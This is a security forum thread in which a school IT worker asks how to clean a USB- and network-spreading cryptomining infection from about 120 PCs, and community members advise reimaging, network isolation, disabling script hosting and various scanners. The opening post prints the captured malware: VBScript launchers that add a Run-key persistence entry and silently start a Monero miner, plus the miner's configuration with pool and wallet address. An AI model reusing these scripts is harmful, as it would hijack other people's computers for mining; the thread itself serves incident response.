Disinfecting multiple PCs at school infected with unknown malware

ttomovcik

Level 1
Thread author
Verified
Oct 30, 2016
17
Hi. I´ve been trying to clean our school PCs (~90 workstations + 30 laptops) and so far, 20 are cleaned. But the problem is the infection still appears after few days. This is what I know about the infection:


I´m sorry, but I was unable to get any checksum of these files, nor the files itself except listed in "File contents" spoiler

Code:
WindowsSearchIndexer
Code:
AddTask.vbs
Code:
Start.vbs
Code:
minerd.exe
Code:
cpuminer.exe

Code:
Spreads over infected usb files and smb shares

Code:
Once the machine is infected, the malware creates shortcuts of original files on USB and sets the shortcut to VBScript which will infect more machines

What is weird for me is that they are running ESET Endpoint security which looks like it allows to run the file but when I access the %Appdata% it picks it as Generic malware and quarantines it.

My question is, how can I quickly remove this infection & what is this malware?

Code:
ON ERROR RESUME NEXT
dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")

checkIn=DateSerial(2017,04,2)
checkOut=DateSerial(2017,04,08)
testMe=Now
If testMe > checkIn And testMe < checkOut Then
ON ERROR RESUME NEXT
shellobj.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemSvchostAssistants", chr(34) & "wscript %APPDATA%\addtask.vbs" & chr(34), "REG_SZ"
shellobj.Run"taskkill /f /im minerd.exe", 0, false
shellobj.Run"taskkill /f /im xmr-stak-cpu.exe", 0, false
wscript.sleep 6000
shellobj.Run shellobj.CurrentDirectory & "\xmr-stak-cpu.exe", 0, false
Else
ON ERROR RESUME NEXT
    shellobj.regdelete "HKCU\software\microsoft\windows\currentversion\run\SystemSvchostAssistants"
    shellobj.Run"taskkill /f /im minerd.exe", 0, false
    shellobj.Run"taskkill /f /im xmr-stak-cpu.exe", 0, false
    'filesystemobj.deletefile(wscript.scriptfullname)
    'wscript.quit
End If

Code:
/*
 * Number of threads. You can configure them below. Cryptonight uses 2MB of memory, so the optimal setting
 * here is the size of your L3 cache divided by 2. Intel mid-to-high end desktop processors have 2MB of L3
 * cache per physical core. Low end cpus can have 1.5 or 1 MB while Xeons can have 2, 2.5 or 3MB per core.
 */
"cpu_thread_num" : 8,

/*
 * Thread configuration for each thread. Make sure it matches the number above.
 * low_power_mode - This mode will double the cache usage, and double the single thread performance. It will
 *                  consume much less power (as less cores are working), but will max out at around 80-85% of
 *                  the maximum performance.
 *
 * no_prefetch -    This mode meant for large pages only. It will generate an error if running on slow memory
 *                  Some sytems can gain up to extra 5% here, but sometimes it will have no difference or make
 *                  things slower.
 *
 * affine_to_cpu -  This can be either false (no affinity), or the CPU core number. Note that on hyperthreading
 *                  systems it is better to assign threads to physical cores. On Windows this usually means selecting
 *                  even or odd numbered cpu numbers. For Linux it will be usually the lower CPU numbers, so for a 4
 *                  physical core CPU you should select cpu numbers 0-3.
 *
 */
"cpu_threads_conf" : [
    { "low_power_mode" : false, "no_prefetch" : false, "affine_to_cpu" : 0 },
    { "low_power_mode" : false, "no_prefetch" : false, "affine_to_cpu" : 1 },
    { "low_power_mode" : false, "no_prefetch" : false, "affine_to_cpu" : 2 },
    { "low_power_mode" : false, "no_prefetch" : false, "affine_to_cpu" : 3 },
    { "low_power_mode" : false, "no_prefetch" : false, "affine_to_cpu" : 4 },
    { "low_power_mode" : false, "no_prefetch" : false, "affine_to_cpu" : 5 },
    { "low_power_mode" : false, "no_prefetch" : false, "affine_to_cpu" : 6 },
    { "low_power_mode" : false, "no_prefetch" : false, "affine_to_cpu" : 7 },
],

/*
 * LARGE PAGE SUPPORT
 * Lare pages need a properly set up OS. It can be difficult if you are not used to systems administation,
 * but the performace results are worth the trouble - you will get around 20% boost. Slow memory mode is
 * meant as a backup, you won't get stellar results there. If you are running into trouble, especially
 * on Windows, please read the common issues in the README.
 *
 * By default we will try to allocate large pages. This means you need to "Run As Administrator" on Windows.
 * You need to edit your system's group policies to enable locking large pages. Here are the steps from MSDN
 *
 * 1. On the Start menu, click Run. In the Open box, type gpedit.msc.
 * 2. On the Local Group Policy Editor console, expand Computer Configuration, and then expand Windows Settings.
 * 3. Expand Security Settings, and then expand Local Policies.
 * 4. Select the User Rights Assignment folder.
 * 5. The policies will be displayed in the details pane.
 * 6. In the pane, double-click Lock pages in memory.
 * 7. In the Local Security Setting – Lock pages in memory dialog box, click Add User or Group.
 * 8. In the Select Users, Service Accounts, or Groups dialog box, add an account that you will run the miner on
 * 9. Reboot for change to take effect.
 *
 * Windows also tends to fragment memory a lot. If you are running on a system with 4-8GB of RAM you might need
 * to switch off all the auto-start applications and reboot to have a large enough chunk of contiguous memory.
 *
 * On Linux you will need to configure large page support "sudo sysctl -w vm.nr_hugepages=128" and increase your
 * ulimit -l. To do do this you need to add following lines to /etc/security/limits.conf - "* soft memlock 262144"
 * and "* hard memlock 262144". You can also do it Windows-style and simply run-as-root, but this is NOT
 * recommended for security reasons.
 *
 * Memory locking means that the kernel can't swap out the page to disk - something that is unlikey to happen on a
 * command line system that isn't starved of memory. I haven't observed any difference on a CLI Linux system between
 * locked and unlocked memory. If that is your setup see option "no_mlck".
 */

/*
 * use_slow_memory defines our behaviour with regards to large pages. There are three possible options here:
 * always  - Don't even try to use large pages. Always use slow memory.
 * warn    - We will try to use large pages, but fall back to slow memory if that fails.
 * no_mlck - This option is only relevant on Linux, where we can use large pages without locking memory.
 *           It will never use slow memory, but it won't attempt to mlock
 * never   - If we fail to allocate large pages we will print an error and exit.
 */
"use_slow_memory" : "warn",

/*
 * NiceHash mode
 * nicehash_nonce - Limit the noce to 3 bytes as required by nicehash. This cuts all the safety margins, and
 *                  if a block isn't found within 30 minutes then you might run into nonce collisions. Number
 *                  of threads in this mode is hard-limited to 32.
 */
"nicehash_nonce" : true,

/*
 * pool_address      - Pool address should be in the form "pool.supportxmr.com:3333". Only stratum pools are supported.
 * wallet_address - Your wallet, or pool login.
 * pool_password  - Can be empty in most cases or "x".
 */
"pool_address" : "cryptonight.eu.nicehash.com:3355",
"wallet_address" : "37LLjdYJUsU4CB64VENm1cjeXKga9jQtg7.w1",
"pool_password" : "x",

/*
 * Network timeouts.
 * Because of the way this client is written it doesn't need to constantly talk (keep-alive) to the server to make
 * sure it is there. We detect a buggy / overloaded server by the call timeout. The default values will be ok for
 * nearly all cases. If they aren't the pool has most likely overload issues. Low call timeout values are preferable -
 * long timeouts mean that we waste hashes on potentially stale jobs. Connection report will tell you how long the
 * server usually takes to process our calls.
 *
 * call_timeout - How long should we wait for a response from the server before we assume it is dead and drop the connection.
 * retry_time    - How long should we wait before another connection attempt.
 *                Both values are in seconds.
 */
"call_timeout" : 60,
"retry_time" : 10,

/*
 * Output control.
 * Since most people are used to miners printing all the time, that's what we do by default too. This is suboptimal
 * really, since you cannot see errors under pages and pages of text and performance stats. Given that we have internal
 * performance monitors, there is very little reason to spew out pages of text instead of concise reports.
 * Press 'h' (hashrate), 'r' (results) or 'c' (connection) to print reports.
 *
 * verbose_level - 0 - Don't print anything.
 *                 1 - Print intro, connection event, disconnect event
 *                 2 - All of level 1, and new job (block) event if the difficulty is different from the last job
 *                 3 - All of level 1, and new job (block) event in all cases, result submission event.
 *                 4 - All of level 3, and automatic hashrate report printing
 */
"verbose_level" : 3,

/*
 * Automatic hashrate report
 *
 * h_print_time - How often, in seconds, should we print a hashrate report if verbose_level is set to 4.
 *                This option has no effect if verbose_level is not 4.
 */
"h_print_time" : 60,

/*
 * Built-in web server
 * I like checking my hashrate on my phone. Don't you?
 * Keep in mind that you will need to set up port forwarding on your router if you want to access it from
 * outside of your home network. Ports lower than 1024 on Linux systems will require root.
 *
 * httpd_port - Port we should listen on. Default, 0, will switch off the server.
 */
"httpd_port" : 0,

/*
 * prefer_ipv4 - IPv6 preference. If the host is available on both IPv4 and IPv6 net, which one should be choose?
 *               This setting will only be needed in 2020's. No need to worry about it now.
 */
"prefer_ipv4" : true,

Code:
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run"taskkill /f /im minerd.exe", 0, false
WshShell.Run"taskkill /f /im xmr-stak-cpu.exe", 0, false
wscript.sleep 6000
WshShell.Run WshShell.CurrentDirectory & "\xmr-stak-cpu.exe", 0, false
 

Attachments

  • SB4-12_D77-IT-PC9_15.6.2017.pdf
    1.7 MB · Views: 916

SHvFl

Level 35
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Nov 19, 2014
2,342
Format, take an image, use a software to freeze the computers so it restores the image on reboot. Cleaning them now will not only waste your time at this time but every time.
 
Last edited:

Winter Soldier

Level 25
Verified
Top Poster
Well-known
Feb 13, 2017
1,486
It looks like a worm that connects with the HTTPD server and by spreading itself over via USB.
Not sure but the sleep function could be used to hide its processes (like process hollowing), or to inactivate itself into sleep mode (timer).
It would be interesting to upload the malware to an online malware analysis service to see the behavior, functions, imports, etc.
If the clients are LAN connected, the infection spread is easy.
No idea how to get rid of this infection because I am not a removal expert, but the above suggestions or possibly multi scan approach with Zemana, MalwareBytes, Norton Power Eraser may be useful.
 

TheMalwareMaster

Level 21
Verified
Honorary Member
Top Poster
Well-known
Jan 4, 2016
1,022
Go with @SHvFl 's advice and if can't then go with @Vasudev 's.
Just a question why not contact ESET directly? Here is the link. I am sure they can help.
That's what I was about to say. They should offer support for endpoint customers. Have you tried making a malware submission to ESET, sending them the undetected files?
 

AtlBo

Level 28
Verified
Top Poster
Content Creator
Well-known
Dec 29, 2014
1,711
You can go through a strict malware removal process for 90 PCs with no 100% guarantee it will be gone, or you can use @SHvFl's counsel and reinstall on all the PCs.

If you have to reinstall, you may want to get lists of installed software for each and then grab all the documents/pics/etc. from each->create a folder for each PC with the list of programs and then place a folder in the folder for files. This is if it's even safe to use USB removable drives to do so. :(

First time I ever thought about how much work this really is to do for this many PCs. Offline backup once a month looks pretty convenient in comparison o_O. For sure as mentioned ESET should be able to offer good advice. Maybe they can determine the problem and provide a removal/cleaning option.
 
Last edited:

RoboMan

Level 34
Verified
Top Poster
Content Creator
Well-known
Jun 24, 2016
2,399
To start with you should unlink all computers from the school home/corporate network they're in. They're pretty much connected with each other, what would make individual cleaning impossible. As well, after that, disable Windows Script Host on all machines to avoid execution of scripts (like VBScript and JScript scripts) that rely on WSH.

After that, you may proceed to clean them up, and hopefully you can do it. You have a few tools here: Free Security Tools Collection
 

AtlBo

Level 28
Verified
Top Poster
Content Creator
Well-known
Dec 29, 2014
1,711
@RoboMan, I was going to go there but started thinking about cleaning up 120 PCs lol :eek:. @SHvFl's method started sounding better :D

Disabling script hosts for 120 PCs and then x 2-3 scans each and removal. WOW. And then no guarantees it will not spread again once back online...:(

I would love to have a crack at one of them...120...Uh maybe not...
 

RoboMan

Level 34
Verified
Top Poster
Content Creator
Well-known
Jun 24, 2016
2,399
@RoboMan, I was going to go there but started thinking about cleaning up 120 PCs lol :eek:. @SHvFl's method started sounding better :D

Disabling script hosts for 120 PCs and then x 2-3 scans each and removal. WOW. And then no guarantees it will not spread again once back online...:(

I would love to have a crack at one of them...120...Uh maybe not...
LOL that's why you work as a School IT guy :cool:
Of course, the method you mention (@SHvFl 's) is much more simple and effective. I just mentioned mine in case format is not an option. :)
 

SHvFl

Level 35
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Nov 19, 2014
2,342
Even if we ignore infection atm, not setting up a system like a said will eventually bite you on your ass. Eventually you will be hit by ransomware or worse a keylogger.
Shared pc have to restore on reboot or else you are asking for trouble.
 
W

WolfensteinXeen

WHAT YOU NEED TO KNOW BEFORE PROCEEDING:

- All the solutions I've provided bellow can be done for free (either the softwares a free or you can use the free trial).

- The ideal would be to have a professional fix those computers and reinforce the security of your network. But since you're asking, i'm guessing that's not an option (maybe school budget is tight or another reason).

- You'll have to accept the fact that cleaning around 120 computers will take some time and that you won't be able to do it alone (not quickly anyway). You'll have to ask the help of some friends, preferably ones that are tech savvy. Also you need to ask your school's principal approval, as i doubt he/she would be happy with you messing around the entire school network without knowing so (i'm just saying that so that you won't end up being in trouble).

- You could either be cleaning all those PCs at once with the help of some friends (you should be at least 10), or a few at a time. Whatever you choose, i would recommend keeping the uninfected computers physically offline (as in with the ethernet cable disconnected and the wifi network disabled) until the entire network is clean to avoid reinfection.

REMOVING MALWARES FROM THE COMPUTERS:

- 1: Update the database of Eset Endpoint security and run a full system scan. This the most basic but first thing to do.
- 2: use a bootable antivirus to cleanup the malware. This can remove some malwares that can't be detected while Windows is running. Bitdefender Rescue CD and Kaspersky Rescue Disk are both good choices and include detailed informations on how to set it up on CD or USB.
3: Scan the computers with HitmanPro and Zemana (keep real time protection on and don't uninstall those yet, you'll know why bellow). These remove more traditional malware.
4: Scan the computers with Malwarebytes and Adwcleaner. These removal some malwares that are missed by other AVs as well as PUPs and PUAs.
5: Scan the computers with Norton Power Eraser. This tool is one of the best to remove hard to detect malware.

Once this is done, you have to keep in mind that Eset Endpoint Security wasn't able to protect your school's network, therefore the infection could occur again even if you think all computers have been cleaned.

PREVENTING COMPUTERS AND NETWORK FROM BEING INFECTED AGAIN:

- 1 I would suggest keeping Malwarebytes Premium or Zemana with real time protection on (only one, not both as they could conflict with each other) for the time of the free trial (15 days for Malwarebytes, 30 days for Zemana). This is why I've advised you not to uninstall those as you would lose the trial upon uninstallation. Also even after the trial is over, Malwarebytes and Zemana will be in a free version and can still be used as second opinion scanners so you should keep both.
- 2 You could immunize the systems to prevent further infections. Spybot Free provides and good immunization tool that's fairly easy to use. While the efficiency of immunization is subject to debate, it's worth a shot.
- 3 You could use Norton ConnectSafe to protect the network. You could set it up on each computers or on the school's network. This will also proved an extra layer of protection at the only cost of the occasional slowdown.

I hope this will help you get your school's network clean again. Good luck ;)
 

roger_m

Level 41
Verified
Top Poster
Content Creator
Dec 4, 2014
3,014
If you want to continue with trying to remove the malware, rather than reformatting, I recommend doing scans with Zemana AntiMalware and Malwarebytes, as they are both very good at finding infections.
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top